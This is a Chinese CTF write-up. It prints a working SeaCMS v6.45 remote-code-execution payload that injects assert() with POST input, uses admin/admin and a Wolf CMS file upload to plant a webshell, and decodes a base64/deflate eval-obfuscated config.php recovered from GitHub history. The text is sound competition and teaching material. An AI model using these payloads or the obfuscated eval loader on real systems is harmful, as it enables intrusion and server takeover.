# No.8 看视频真嗨皮(读:50分,写:100分)
| 提交 关键字词:一档靶标题 =============================================================== 周末看个电影放松一下吧!
|
海洋cms v6.45前台getshell漏洞
payload:
| url:http://6f781364dedf5dc1eb877079f415877b.xnuca.cn/search.php?searchtype=5&tid=0&year=23334444);assert($_POST[1]);// post:searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=phpinfo();
|
phpinfo()正常执行。
通过system函数执行命令。
找flag位置
查询flag
创建文件
# No.23 找入口(读:100分,写:200分)
| 提交 关键字词:二档靶标题 =============================================================== 本站的基本职能是什么
|
找到网站后台,发现后台是弱口令username=admin&password=admin。
wolfcms 任意文件上传
后台直接上传shell,根据前台的logo找到对应的路径。
按照上一题的套路查看flag,写文件。
第三轮
0x00信息收集
#### 操作内容
根据提示,访问main.js,找到作者信息
| /* * main.js v1.0 * * 2017/5/20 * author l1Kai@youngin.uu.me * */
|
github找到作者https://github.com/l1Kai/user
获得config.php和flag
| <?php
// Obfuscation wrapper recovered from the repository's config.php.
// $payload is the hidden source, wrapped as base64(deflate(base64(source)))
// (that is the reverse of the decode chain evaluated below).
$payload="fVJNc9sgEP1BuUhOPC2HHmxsbJBCDAgkc5NRJCtCHx3HVsivL5aTaZtDDgwDu++93be7Yj2FHbEmU4NpZZ+FYC0UKTP30MUzHR5aGuQpOMfdsjfQDE9jEK3Y0OhUDwefjxsOxRokCuITflk76h7G+GVxfhR4ytUb1ebp3EawWDOrEq5wF0PTRcmJwpZb3dqzFlXH14QxRRPixo645se/GiTgMGkQ5cKciDNfeUUSAMkRIcS9lVnAibSgjGt8ieuHC67/58K2QMwCKRR/5AKfyF1eHe/auoVfeQmTDShFoDSuxzqq+9+e7+x5hyf384K3Ra8zYvHGvmO0FEkIYq6aaucWFFZBlKf7KoKo0xkvDynq8pSW3uNLsVHv2awY964aIhZEz14Tw0XleVoMq6NOw7HYNj1BYMsVm3Km+Nb7Vfsb3s5HvMKroNqnvDGzt6OZHa0Jge9VjRHkJQ+UnHyecEuwYv2E/ajNHrJl8CyqJguXOxl+q8WSkMrvtOS0A1evbxolu+5J/4lf+RnFQsrrG+ANavSWnvYZ9R7S0ntuDfR1BHSXBK+Ei788Hiu4Qoorr/8dNiRIKoWufVzneNMfnM5QmPs5RYjskpCvZdOciQMX05qLmYVH0/F5HNLXfUa8F/OXwwa9Gzcf8+3itqMdteaeDofZvDT33Oezfvr3M9bZcShWp19/AA==";
// The 'e' (eval) modifier makes preg_replace() evaluate the replacement string
// as PHP code for each match of /.*/ against the subject '.'.
// The "\x.." escapes spell out:
//   eval(base64_decode(gzinflate(base64_decode($payload),0)))
// so merely including this file decodes and executes the hidden source.
// The 'e' modifier was removed in PHP 7.0, so this wrapper only works on PHP 5.x.
// To inspect the hidden source safely, decode it offline with echo in place of
// eval rather than loading the file.
preg_replace('/.*/e',"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x70\x61\x79\x6c\x6f\x61\x64\x29\x2c\x30\x29\x29\x29",'.');
?> flag{e76cd8c1-d747-4259-aaac-bc36efe62462}
|
FLAG值
flag{e76cd8c1-d747-4259-aaac-bc36efe62462}
0x01信息分析
操作内容
用python输出\x部分。
eval(base64_decode(gzinflate(base64_decode($payload),0)))
php解密
| <?php
// Offline decoder for the obfuscated config.php: runs the same
// base64 -> inflate -> base64 chain as the original wrapper, but prints
// the recovered source with echo instead of handing it to eval().
$payload = "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";
$inflated = gzinflate(base64_decode($payload), 0);
$source = base64_decode($inflated);
echo $source;
?>
|
得到config.php
| // Decoded config.php (the current revision; PRO_KEY is masked here).
// Helper functions; addslashes_deep() used below is presumably defined there — verify.
require(__DIR__.'/function.php');
// Database and site constants. DBUSER/DBPASS/DBNAME are empty in this revision
// and PRO_KEY is masked as "***....".
define("DBHOST","127.0.0.1"); define('DBUSER',''); define('DBPASS',''); define('DBNAME',''); define('ROOTDRI',__DIR__."/../"); define("WEB_TITLE",'标题'); define("PRO_KEY","***....");
// Legacy magic-quotes emulation: when magic_quotes_gpc is off, every request
// superglobal is run through addslashes_deep(). This is PHP 5-era input handling
// (get_magic_quotes_gpc() no longer exists in PHP 8) and is not a substitute for
// parameterised queries or context-specific output escaping.
if (!get_magic_quotes_gpc()) { if (!empty($_GET)) { $_GET = addslashes_deep($_GET); } if (!empty($_POST)) { $_POST = addslashes_deep($_POST); }
$_COOKIE = addslashes_deep($_COOKIE); $_REQUEST = addslashes_deep($_REQUEST); }
// Template engine bootstrap and session start.
require(ROOTDRI.'/org/smarty/Smarty.class.php'); session_start();
// Unconditional exit at the end of the decoded fragment.
exit;
|
查看之前的历史提交,找到最初的config.php,修改php输出执行的内容。
| <?php
// Earlier revision of the obfuscated config.php, taken from the repository's
// commit history. The helper names are randomised; their roles are noted below.

// Hand-rolled base64 decoder. $keyStr is the standard alphabet, with '=' at index 64.
function _rZBFc5($_AXxuMn) {
    $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    $chr1 = $chr2 = $chr3 = "";
    $enc1 = $enc2 = $enc3 = $enc4 = "";
    $i = 0;
    $output = "";
    // NOTE(review): meant to strip non-base64 characters, but the pattern has no
    // explicit delimiter, so PHP takes the leading '[' and trailing ']' as the
    // delimiters and the pattern becomes the literal '^A-Za-z0-9\+\/\=' — it only
    // replaces a subject that starts with that literal. Left as found.
    $_AXxuMn = preg_replace("[^A-Za-z0-9\\+\\/\\=]", "", $_AXxuMn);
    do {
        // Four 6-bit values per group, looked up by position in $keyStr.
        $enc1 = strpos($keyStr, substr($_AXxuMn, $i++, 1));
        $enc2 = strpos($keyStr, substr($_AXxuMn, $i++, 1));
        $enc3 = strpos($keyStr, substr($_AXxuMn, $i++, 1));
        $enc4 = strpos($keyStr, substr($_AXxuMn, $i++, 1));
        // Repack 4 x 6 bits into 3 bytes.
        $chr1 = $enc1 << 2 | $enc2 >> 4;
        $chr2 = ($enc2 & 15) << 4 | $enc3 >> 2;
        $chr3 = ($enc3 & 3) << 6 | $enc4;
        $output = $output . chr((int) $chr1);
        // Index 64 is the '=' padding character: padded bytes are not emitted.
        if ($enc3 != 64) { $output = $output . chr((int) $chr2); }
        if ($enc4 != 64) { $output = $output . chr((int) $chr3); }
        $chr1 = $chr2 = $chr3 = "";
        $enc1 = $enc2 = $enc3 = $enc4 = "";
    } while ($i < strlen($_AXxuMn));
    return $output;
}
// base64 decode (thin alias of _rZBFc5).
function _g1S4Ve($_XJwGpK) { return _rZBFc5($_XJwGpK); }
// Raw DEFLATE decompression, no output length limit.
function _Xvtafz($_4LYEpc) { return gzinflate($_4LYEpc, 0); }
// The original code-execution sink. It is not called below: the final statement
// was changed to echo the decoded source instead of eval()ing it.
function _ehljDM($_j045Zz) { return eval($_j045Zz); }
$_Za0oXi = "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";
// base64 -> inflate -> base64, printed rather than executed.
// (_Xvtafz declares one parameter; the extra 0 argument is ignored.)
echo _g1S4Ve(_Xvtafz(_g1S4Ve($_Za0oXi),0))
?>
|
得到flag
|
// Decoded config.php from the earliest commit; identical to the later revision
// except that PRO_KEY is present in clear here.
// Helper functions; addslashes_deep() used below is presumably defined there — verify.
require(__DIR__.'/function.php');
// Database and site constants. DBUSER/DBPASS/DBNAME are empty; PRO_KEY is the
// secret that the later revision masks — committing it is what leaked it.
define("DBHOST","127.0.0.1"); define('DBUSER',''); define('DBPASS',''); define('DBNAME',''); define('ROOTDRI',__DIR__."/../"); define("WEB_TITLE",'标题'); define("PRO_KEY","1071f87ebcf2fb9f96f174eca1ee2dd6");
// Legacy magic-quotes emulation (PHP 5-era; get_magic_quotes_gpc() no longer
// exists in PHP 8). Slash-escaping request data is not a substitute for
// parameterised queries or context-specific output escaping.
if (!get_magic_quotes_gpc()) { if (!empty($_GET)) { $_GET = addslashes_deep($_GET); } if (!empty($_POST)) { $_POST = addslashes_deep($_POST); }
$_COOKIE = addslashes_deep($_COOKIE); $_REQUEST = addslashes_deep($_REQUEST); }
// Template engine bootstrap and session start.
require(ROOTDRI.'/org/smarty/Smarty.class.php'); session_start();
// Unconditional exit at the end of the decoded fragment.
exit;
|
FLAG值
flag{9660dc40-0272-44fd-a045-6e6f0f98fca0}
0x02开始渗透
操作内容
github上的项目名为user,访问user目录,提示登陆。
根据登陆页面,用户名是邮箱,根据给出提示猜测密码。
邮箱为github邮箱,密码为likai,得到flag。
FLAG值
flag{cc498da1-3918-48be-b9e2-c64c69a5349e}